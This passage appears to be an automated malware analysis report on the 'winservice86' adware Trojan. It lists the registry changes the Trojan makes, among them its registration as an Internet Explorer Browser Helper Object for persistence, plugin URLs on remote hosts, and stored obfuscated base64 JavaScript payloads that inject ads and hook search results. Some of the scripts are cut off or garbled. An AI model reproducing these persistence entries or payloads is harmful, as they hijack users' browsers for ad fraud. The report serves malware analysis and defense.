[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611471155}"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 8C 1C B0 0B 88 D9 06 E1 96 D5 AD 26 BB 93 F6"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\VersionIndependentProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622472255}"

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\VersionIndependentProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\0\win32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611471155}]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\VersionIndependentProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611471155}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories]

The process %original file name%.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\winservice86\Plugins\102]
"Version" = "10"

[HKCU\Software\winservice86\Plugins\184]
"Name" = "noproblemppc_m"

[HKCU\Software\winservice86\Plugins\41]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/41.js"

[HKCU\Software\winservice86\Plugins\14]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/14.js"

[HKCU\Software\winservice86\Plugins\45]
"Name" = "IEOnRequest"

[HKCU\Software\winservice86\Plugins\220]
"Name" = "icm_base_m"

[HKCU\Software\winservice86\Plugins\230]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMWYxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDA2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YTVhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMDQxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJlMzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MTMxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0YTY3MDU=', 'xvnahjjxhm'); }"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppName" = "winservice86-codedownloader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\winservice86\Manifest]
"ModeType" = "production"

[HKCU\Software\winservice86\Plugins\424]
"URL" = "http://js.newcloudrack.com/plugins/mins/424.js"

[HKCU\Software\winservice86\Plugins\44]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/44.js"
"Name" = "IEMisc"

[HKCU\Software\winservice86\Plugins\17]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/17.js"

[HKCU\Software\winservice86\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

[HKCU\Software\winservice86\Plugins\230]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/230.js"

[HKCU\Software\winservice86\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2NDRmNGU1MDQ4NTQxZTEwMWUwMDNiMWQwMjUyNTI1NjU0MGMxZTA0MWU1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjAwMDIwMjE0MTkyNTFjMDM0YzRhNDg1NDFlMTAxZTAwMWQ1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjE4MWEwMzAzMDMxZTI3MGI0YzRhNDg0NzQ2NTA2MDBk', 'pnonphvvdj'); }"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"CrPublisherId" = "17638"

[HKCU\Software\winservice86\Installer]
"subid" = "0"

[HKCU\Software\winservice86\Plugins\36]
"Name" = "IEBackground"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"pv" = "1.3.25.0"

[HKCU\Software\winservice86\Manifest]
"ChangePrevious" = "false"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"Policy" = "1"

[HKCU\Software\InstalledBrowserExtensions\Corporate Inc]
"64755" = "winservice86"

[HKCU\Software\winservice86\Plugins\273]
"Version" = "4"

[HKCU\Software\winservice86\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA3ODU2NTA0NjU0NTQwZDE4MWIxYjI3MDQxYzQ0NGU1NjQ3MDQxYjFmMDI0YzVmNDkxNzEyMGIwZjBlMDgxYTEzNDE0YjE1NTgwNDA3MGUwNjEzMWYxODAyNWExODAwMTg0MDE4MDcxNDVmMTA0NzQ0NTQ1NTBkMGY1ZDI5MmYyNTI2MzkzNjNmM2QyMjM2MzMyMjM5MzEyZTMxMjkyMTJmMzczMjJmMzUyMTM0M2EyNTJiMzQyZDU5MWM0ODFlMDU1YTFjMDYwZjRmNDc0MDVmNDA1MDAwMTQxYjU2MmQyOTMzMzQzYjI1MzYzZTI2MmYzNzI0MmYyNzI0MjYzYTIyMmUyNjM3MjkyZjQwMDcwZjE2MTgwYTA2MWIxMjRkMzkyYjM1MzcyMzNjMzgyMDNmMzQyMzI2MjkyYzIyM2MzZjMzM2EzYzIzMjYyOTMwM2YyYTM5MmQzZjM0MzkyYjU0NDk2NjRmNGI1MjU2NTIwZTAwMDIxNTFmM2ExOTFlNTQ0YTQ2NTYxZTExMTgxZjE4NDg1OTVmMDUxMDE4MDYwZDBjMDMxNzQ3NWQwNzVhMTcwZTBkMDIwYTFiMWUxNDQ4MWExMzExNDMxYzFlMTA1OTA2NTU0NjQ3NWMwZTBiNDQyZDI5MzMzNDNiMjUzNjNlMjYyZjM3MjQyZjIzMmMyMjIwMjIyYjJlMzYyOTIzMzMzNjI5MmMyODMwMzQ1ZDFhNWUwYzA3NDkxNTA1MGI1NjQzNDY0OTUyNTIxMzFkMTg1MjM0MmQzNTIyMjkyNzI1MzcyNTJiMmUyMDI5MzEzNjI0MjkyYjJkMjIyZTJkMjk1NjE1MGQwNTExMDkwMjAyMTY0YjJmMzkzNzI0MmEzZjNjMzkzYjMyMzUzNDJiM2YyYjNmM2IyYTNlM2EzNTM0MmIyMzM2MjkzZDM0M2IzMjJmMzk1NjVhNmY0YzRmNGI1MjU0MDAwYTAxMTE"

[HKCU\Software\winservice86\Plugins\4]
"Name" = "jquery_1_7_1"

[HKLM\SOFTWARE\winservice86\Installer]
"BundledFirefox" = "1"

[HKCU\Software\winservice86\Plugins\36]
"Version" = "8"

[HKCU\Software\winservice86\Plugins\40]
"Name" = "IEExtension"

[HKCU\Software\winservice86\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

[HKCU\Software\winservice86\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberOé·¼"

[HKCU\Software\winservice86\Plugins\128]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDk3MDY1NDYwZjE2MTExZjNjMTkxZTU4NTY0NDQ1MGExMTFiMTk1MTVkNTUxYjEzMTA0YzE2MWExOTBlMDAxYzA1MTcwZjRjMDYwMDA0NDQwNTA5NDMxNzAxM2QwODBlMDAwNTVjMTAxZjE0NTgwNjA5MWMwNjFlMDAxOTA5NTkxNTEyMWQxYjE5MWQxZjVjMTkxNzAyMTAyYzBiNTQwYTEwMTk0YTI3MzMyYjIxNTIzNjM0MzEyODIzMzczNDMwMmMyYjJjMzkyZDNmMzQzMDIyMmMyMTJhMmQzNDIxMmYyZTNiMmUyNjNhMzA0ZjFiMTMwODE4MGEwMjEwMGIwZTA0MGU0ZjI1MzMyNzM1MmQzNjNjM2IyMjM2M2YzZTNiMjYzMjM1MzAyNzJhM2YzZjMzM2I0NTRlNmY2NjRiMDMwNjBlMWMxNzMyMTAwOTRkNTM0YjUwMTIxODEwMTcxMTVmNDA0NjFjMDUwZDQyMTcxMjEyMDAxZDBmMDIwMTEyNDIwNzA4MGY0YTE4MWE0NDAxMWMzMzA5MDYwYjBiNDEwMzE4MDI0NTA4MDgxNDBkMTAxZDBhMGU0ZjA4MWMxYzEzMTIxMzAyNGYxZTAxMWYxZTJkMDM1ZjA0MGQwYTRkMzEyZTI1MjA1YTNkM2EyYzNiMjQyMTI5M2UyZDIzMjczNzMwMmMzMzI2M2YyMjIwMjIyNjNhM2MzYzI5MmQzMzI4M2IzODQ0MTUwZTFiMWYxYzFmMWUwYTA2MGYwMDUyMzYzNDMxMjgyMzM3MzQzMDJjMmIyYzM5MmQzYjNjMzQzODJjMjQyMjJjMzQyZDU4NDA2ZTZlNDAxNTAzMWMwYzFiMTQyNTAwNDU1ODQ1NWU1YjUzNzgwNw==', 'rzldgbeoik'); }"

[HKCU\Software\winservice86\Plugins\345]
"Name" = "pluginsVerticals"

[HKCU\Software\winservice86\Plugins\7]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/7.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\winservice86\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2NjY1NWExMjBjMTUxZTJkMTgxYTRlNTY1ODU4MTAxNTFhMDg1MDU5NDMwZjFjMTQ1NjE3MDcwYjBiMTIwODQyMWIxNTE1NGUxZDFiMTgxZjFjMTg1NzRiNGM1NDU4NGY1ZDQ0NTk1YjRlNGY1NzExMWMxZDA2MTkwZDA4NTYxMDBiNWUxZDBkMDgxZjA4NTEyNzI1M2IzMzIxMmIzOTI0MjUyODNkMjgyNzI0MzYyYzJmMzgyODI5M2MyNTJiMzQyYzI3MjMzMjMzMzM1ZTBmMTU1YzMxMjcyOTI0MjMzZjJiMjgzMTI1MmIyYTM1MzczYzNjMjczNDM5MmMyYjI3MzU1NDQwNjY3MTU4MTAxNTFhMDgxOTIzMWUwMDVhNDA1ODQzMDYwYzFlMDYxZjU2NTc1NTFiMDUwMDU2MWMxZjFmMGQxYzFlNTYwMjAxMTU0NTA1MGYxZTExMGEwYzRlNWY0YzVmNDA1YjViNGE0ZjRmNTc1YjU3MWEwNDA5MDAxNzFiMWM0ZjA0MGI1NTA1MTkwZTExMWU0NTNlMzEzYjM4MzkzZjNmMmEzMzNjMjQzYzI3MmYyZTM4MjkzNjNlM2QyNTMxMmIzZjM0MzMyNTNjMjUyNzQ3MWIxNTU3MjkzMzJmMmEzNTJiMzIzYzMxMmUzMzNlMzMzOTJhMjgzZTIwMzkyNzMzMzMzMzVhNTY3MjY4NGMwODA2MDMwYjA1MTYzMzFjNDM1NDU4NTg0NDVmNjYwNQ==', 'vllxzxanxj'); }"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppPath" = "%Program Files%\winservice86"

[HKCU\Software\winservice86\Plugins\35]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/35.js"

[HKCU\Software\winservice86\Plugins\13]
"Version" = "7"

[HKCU\Software\winservice86\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"

[HKCU\Software\winservice86\Plugins\128]
"Name" = "superfish_pricora_m"

[HKCU\Software\winservice86\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\winservice86\Plugins\9]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/9.js"

[HKCU\Software\winservice86\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"

[HKCU\Software\winservice86\Plugins\7]
"Name" = "hooks"

[HKCU\Software\winservice86\Plugins\47]
"Version" = "3"

[HKCU\Software\winservice86\Plugins\263]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/263.js"

[HKCU\Software\winservice86\Plugins\2]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/2.js"

[HKCU\Software\winservice86\Plugins\376]
"Version" = "12"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\winservice86\Plugins\289]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/289.js"

[HKCU\Software\winservice86\Plugins\64]
"Name" = "appApiMessage"

[HKCU\Software\winservice86\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"

[HKCU\Software\winservice86\Installer]
"srcid" = "002201"

[HKCU\Software\winservice86\Plugins\242]
"Version" = "4"

[HKCU\Software\winservice86\Plugins\380]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMGEwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYjJlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYwYjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExNDYwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAyNWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0ODBmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgwNzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0MzQyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMDM3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMDAwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMzMzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTEx"

[HKCU\Software\winservice86\Debug]
"IsDebuggingPlugins" = "0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppName" = "winservice86-codedownloader.exe"

[HKLM\SOFTWARE\winservice86\IE]
"TotalProfiles" = "1"

[HKCU\Software\winservice86\Plugins\64]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/64.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\winservice86\Plugins\242]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/242.js"

[HKCU\Software\winservice86\Plugins\220]
"Version" = "25"

[HKCU\Software\winservice86\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,url"

    [HKCU\Software\winservice86\Plugins\339]
    "Name" = "adworks_jobs_m"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "AppName" = "winservice86-bg.exe"

    [HKCU\Software\winservice86\Plugins\193]
    "Name" = "revizer_p_dynamic_b2b_m"

    [HKCU\Software\winservice86\Installer]
    "ErrorsDomain" = "http://errors.newdemoonlinecloud.com"

    [HKCU\Software\winservice86\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\winservice86\Plugins\390]
    "Version" = "1"

    [HKCU\Software\winservice86\Plugins\93]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/93.js"

